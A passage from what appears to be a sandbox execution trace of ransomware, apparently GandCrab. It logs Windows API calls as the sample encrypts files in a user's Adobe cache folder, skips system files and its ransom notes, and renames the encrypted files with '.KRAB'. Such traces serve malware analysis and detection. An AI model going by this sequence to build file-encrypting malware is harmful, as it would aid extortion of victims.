DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0056.215] WriteFile (in: hFile=0x454, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e5a0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e5a0*=0x1f6e, lpOverlapped=0x0) returned 1 [0056.216] CloseHandle (hObject=0x454) returned 1 [0056.216] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.216] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0056.216] GetSystemTime (in: lpSystemTime=0x3030400 | out: lpSystemTime=0x3030400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x3, wMilliseconds=0x1a5)) [0056.217] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0056.259] GetWindowsDirectoryW (in: lpBuffer=0x35f0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0056.260] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x35f0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x35f0600, lpMaximumComponentLength=0x35f0608, lpFileSystemFlags=0x35f0604, lpFileSystemNameBuffer=0x35f0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x35f0600*=0xd2ca4def, lpMaximumComponentLength=0x35f0608*=0xff, lpFileSystemFlags=0x35f0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0056.261] wsprintfW (in: param_1=0x3030000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\d2ca4a08d2ca4dee3d.lock") returned 86 [0056.290] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\acrobat\\dc\\jscache\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x454 [0056.298] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.298] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.299] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\") returned 63 [0056.299] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\*" [0056.299] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\*", lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 0xfbe0a0 [0056.299] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.299] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0056.299] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0056.299] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.299] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0056.299] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0056.299] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0056.299] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\d2ca4a08d2ca4dee3d.lock" [0056.299] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0056.300] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 91 [0056.300] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\d2ca4a08d2ca4dee3d.lock") returned 86 [0056.300] lstrlenW (lpString=".lock") returned 5 [0056.300] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0056.300] wsprintfW (in: param_1=0x35f0000, param_2="%s " | out: param_1=".lock ") returned 6 [0056.300] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.300] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.301] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0056.301] lstrcmpW (lpString1="GlobData", lpString2=".") returned 1 [0056.301] lstrcmpW (lpString1="GlobData", lpString2="..") returned 1 [0056.301] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\", lpString2="GlobData" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\GlobData") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\GlobData" [0056.301] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0056.301] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\GlobData.KRAB") returned 76 [0056.301] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\GlobData") returned 71 [0056.301] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\GlobData") returned 71 [0056.301] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\GlobData") returned 71 [0056.301] lstrcmpiW (lpString1="GlobData", lpString2="desktop.ini") returned 1 [0056.301] lstrcmpiW (lpString1="GlobData", lpString2="autorun.inf") returned 1 [0056.301] lstrcmpiW (lpString1="GlobData", lpString2="ntuser.dat") returned -1 [0056.301] lstrcmpiW (lpString1="GlobData", lpString2="iconcache.db") returned -1 [0056.310] lstrcmpiW (lpString1="GlobData", lpString2="bootsect.bak") returned 1 [0056.310] lstrcmpiW (lpString1="GlobData", lpString2="boot.ini") returned 1 [0056.310] lstrcmpiW (lpString1="GlobData", lpString2="ntuser.dat.log") returned -1 [0056.310] lstrcmpiW (lpString1="GlobData", lpString2="thumbs.db") returned -1 [0056.310] lstrcmpiW (lpString1="GlobData", lpString2="KRAB-DECRYPT.html") returned -1 [0056.310] lstrcmpiW (lpString1="GlobData", lpString2="KRAB-DECRYPT.txt") returned -1 [0056.310] lstrcmpiW (lpString1="GlobData", lpString2="CRAB-DECRYPT.txt") returned 1 [0056.310] lstrcmpiW (lpString1="GlobData", lpString2="ntldr") returned -1 [0056.310] lstrcmpiW (lpString1="GlobData", lpString2="NTDETECT.COM") returned -1 [0056.310] lstrcmpiW (lpString1="GlobData", lpString2="Bootfont.bin") returned 1 [0056.311] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0056.311] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0xfbca08) returned 1 [0056.312] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3600000 [0056.312] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0056.312] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0056.312] CryptGenRandom (in: hProv=0xfbca08, dwLen=0x20, pbBuffer=0x338e54c | out: pbBuffer=0x338e54c) returned 1 [0056.312] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0056.312] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.313] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0xfbca08) returned 1 [0056.313] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3600000 [0056.313] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0056.314] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0056.314] CryptGenRandom (in: hProv=0xfbca08, dwLen=0x8, pbBuffer=0x338e56c | out: pbBuffer=0x338e56c) returned 1 [0056.314] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0056.314] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.314] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0xfbca08) returned 1 [0056.315] CryptImportKey (in: hProv=0xfbca08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0xfbd3e0) returned 1 [0056.315] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0056.315] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x35f0000*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x35f0000*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0056.315] GetLastError () returned 0x0 [0056.315] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0056.315] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0056.315] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0xfbca08) returned 1 [0056.316] CryptImportKey (in: hProv=0xfbca08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0xfbd560) returned 1 [0056.316] CryptGetKeyParam (in: hKey=0xfbd560, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0056.316] CryptEncrypt (in: hKey=0xfbd560, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x35f0100*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x35f0100*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0056.316] GetLastError () returned 0x0 [0056.316] CryptDestroyKey (hKey=0xfbd560) returned 1 [0056.316] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0056.316] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\GlobData" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\acrobat\\dc\\jscache\\globdata"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x45c [0056.331] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3600000 [0056.331] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0056.331] ReadFile (in: hFile=0x45c, lpBuffer=0x3600000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e57c, lpOverlapped=0x0 | out: lpBuffer=0x3600000*, lpNumberOfBytesRead=0x338e57c*=0x16, lpOverlapped=0x0) returned 1 [0056.347] SetFilePointerEx (in: hFile=0x45c, liDistanceToMove=0xffffffea, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0056.347] WriteFile (in: hFile=0x45c, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x16, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338e578*=0x16, lpOverlapped=0x0) returned 1 [0056.347] WriteFile (in: hFile=0x45c, lpBuffer=0x35f0000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x35f0000*, lpNumberOfBytesWritten=0x338e578*=0x208, lpOverlapped=0x0) returned 1 [0056.347] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.351] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.351] CloseHandle (hObject=0x45c) returned 1 [0056.353] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.354] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\GlobData" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\acrobat\\dc\\jscache\\globdata"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\GlobData.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\acrobat\\dc\\jscache\\globdata.krab")) returned 1 [0056.357] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.357] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0056.357] lstrcmpW (lpString1="GlobSettings", lpString2=".") returned 1 [0056.357] lstrcmpW (lpString1="GlobSettings", lpString2="..") returned 1 [0056.357] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\", lpString2="GlobSettings" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\GlobSettings") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\GlobSettings" [0056.357] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0056.358] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\GlobSettings.KRAB") returned 80 [0056.358] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\GlobSettings") returned 75 [0056.358] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\GlobSettings") returned 75 [0056.358] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\GlobSettings") returned 75 [0056.358] lstrcmpiW (lpString1="GlobSettings", lpString2="desktop.ini") returned 1 [0056.358] lstrcmpiW (lpString1="GlobSettings", lpString2="autorun.inf") returned 1 [0056.358] lstrcmpiW (lpString1="GlobSettings", lpString2="ntuser.dat") returned -1 [0056.358] lstrcmpiW (lpString1="GlobSettings", lpString2="iconcache.db") returned -1 [0056.358] lstrcmpiW (lpString1="GlobSettings", lpString2="bootsect.bak") returned 1 [0056.358] lstrcmpiW (lpString1="GlobSettings", lpString2="boot.ini") returned 1 [0056.358] lstrcmpiW (lpString1="GlobSettings", lpString2="ntuser.dat.log") returned -1 [0056.358] lstrcmpiW (lpString1="GlobSettings", lpString2="thumbs.db") returned -1 [0056.358] lstrcmpiW (lpString1="GlobSettings", lpString2="KRAB-DECRYPT.html") returned -1 [0056.358] lstrcmpiW (lpString1="GlobSettings", lpString2="KRAB-DECRYPT.txt") returned -1 [0056.358] lstrcmpiW (lpString1="GlobSettings", lpString2="CRAB-DECRYPT.txt") returned 1 [0056.358] lstrcmpiW (lpString1="GlobSettings", lpString2="ntldr") returned -1 [0056.358] lstrcmpiW (lpString1="GlobSettings", lpString2="NTDETECT.COM") returned -1 [0056.358] lstrcmpiW (lpString1="GlobSettings", lpString2="Bootfont.bin") returned 1 [0056.358] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0056.359] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0xfbca08) returned 1 [0056.359] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3600000 [0056.360] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0056.360] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0056.360] CryptGenRandom (in: hProv=0xfbca08, dwLen=0x20, pbBuffer=0x338e54c | out: pbBuffer=0x338e54c) returned 1 [0056.360] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0056.360] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.360] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0xfbca08) returned 1 [0056.361] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3600000 [0056.361] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0056.361] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0056.361] CryptGenRandom (in: hProv=0xfbca08, dwLen=0x8, pbBuffer=0x338e56c | out: pbBuffer=0x338e56c) returned 1 [0056.361] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0056.361] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.362] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0xfbca08) returned 1 [0056.362] CryptImportKey (in: hProv=0xfbca08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0xfbd3e0) returned 1 [0056.362] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0056.362] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x35f0000*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x35f0000*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0056.363] GetLastError () returned 0x0 [0056.363] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0056.363] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0056.363] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0xfbca08) returned 1 [0056.363] CryptImportKey (in: hProv=0xfbca08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0xfbd7e0) returned 1 [0056.363] CryptGetKeyParam (in: hKey=0xfbd7e0, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0056.363] CryptEncrypt (in: hKey=0xfbd7e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x35f0100*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x35f0100*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0056.364] GetLastError () returned 0x0 [0056.364] CryptDestroyKey (hKey=0xfbd7e0) returned 1 [0056.364] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0056.364] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\GlobSettings" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\acrobat\\dc\\jscache\\globsettings"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x45c [0056.364] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3600000 [0056.365] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0056.365] ReadFile (in: hFile=0x45c, lpBuffer=0x3600000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e57c, lpOverlapped=0x0 | out: lpBuffer=0x3600000*, lpNumberOfBytesRead=0x338e57c*=0x18, lpOverlapped=0x0) returned 1 [0056.380] SetFilePointerEx (in: hFile=0x45c, liDistanceToMove=0xffffffe8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0056.380] WriteFile (in: hFile=0x45c, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338e578*=0x18, lpOverlapped=0x0) returned 1 [0056.380] WriteFile (in: hFile=0x45c, lpBuffer=0x35f0000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x35f0000*, lpNumberOfBytesWritten=0x338e578*=0x208, lpOverlapped=0x0) returned 1 [0056.380] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.384] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.385] CloseHandle (hObject=0x45c) returned 1 [0056.385] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.386] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\GlobSettings" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\acrobat\\dc\\jscache\\globsettings"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\GlobSettings.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\acrobat\\dc\\jscache\\globsettings.krab")) returned 1 [0056.396] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.396] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0056.396] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0056.396] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0056.396] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\KRAB-DECRYPT.txt" [0056.396] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0056.396] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\KRAB-DECRYPT.txt.KRAB") returned 84 [0056.396] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\KRAB-DECRYPT.txt") returned 79 [0056.396] lstrlenW (lpString=".txt") returned 4 [0056.396] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0056.397] wsprintfW (in: param_1=0x35f0000, param_2="%s " | out: param_1=".txt ") returned 5 [0056.397] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.397] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\KRAB-DECRYPT.txt") returned 79 [0056.397] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\KRAB-DECRYPT.txt") returned 79 [0056.397] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0056.397] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0056.397] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0056.397] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0056.397] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0056.397] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0056.397] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0056.397] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0056.397] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0056.397] lstrcmpiW 